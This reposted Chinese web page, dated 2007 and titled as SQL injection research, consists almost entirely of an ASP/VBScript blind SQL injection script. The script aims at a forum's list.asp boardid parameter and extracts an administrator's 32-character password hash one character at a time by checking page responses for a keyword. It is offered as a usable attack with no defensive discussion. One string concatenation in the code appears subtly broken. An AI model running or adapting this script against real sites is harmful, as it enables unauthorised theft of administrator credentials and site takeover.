SQL注入研究(转)
来源:
互联网
日期:2007-6-28
Visual Basic代码
- <%
-
-
- Function bytes2BSTR(vIn)
- dim strReturn
- dim i,ThisCharCode,NextCharCode
- strReturn = ""
- For i = 1 To LenB(vIn)
- ThisCharCode = AscB(MidB(vIn,i,1))
- If ThisCharCode < &H80 Then
- strReturn = strReturn & Chr(ThisCharCode)
- Else
- NextCharCode = AscB(MidB(vIn,i+1,1))
- strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
- i = i + 1
- End If
- Next
- bytes2BSTR = strReturn
- End Function
-
- function getHTTPPage(url)
- dim http
- set http=createobject("MSXML2.XMLHTTP")
- Http.open "GET",url,false
- Http.send()
- if Http.readystate<>4 then
- exit function
- end if
- getHTTPPage=bytes2BSTR(Http.responseBody)
- set http=nothing
- if err.number<>0 then err.Clear
- end function
-
- Function RegExpTest(patrn, strng)
- Dim regEx, retVal
- Set regEx = New RegExp
- regEx.Pattern = patrn
- regEx.IgnoreCase = False
- RegExpTest = regEx.Test(strng)
- End Function
-
- password=""
- keyword="论坛首页"
- url1="http://qq/bbs/list.asp?boardid=7"
- passlen=32
- dim pass
- pass=array(48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102)
-
- server.ScriptTimeout=999
- for i=1 to passlen
- flag=false
- url=url1" and (select asc(mid(password,"&i",1)) from admin where id>0)="
- for j=0 to ubound(pass)
- str=getHTTPPage(url&pass(j))
- flag=RegExpTest(keyword,str)
- if flag=true then
- password=password&chr(pass(j))
- exit for
- end if
- next
- next
-
- response.Write(password)
- %>
更多的SQL注入研究(转)请到论坛查看: http://BBS.TC711.COM
【 双击滚屏 】 【 评论 】 【 收藏 】 【 打印 】 【 关闭 】
来源:
互联网
日期:2007-6-28
|
|
|
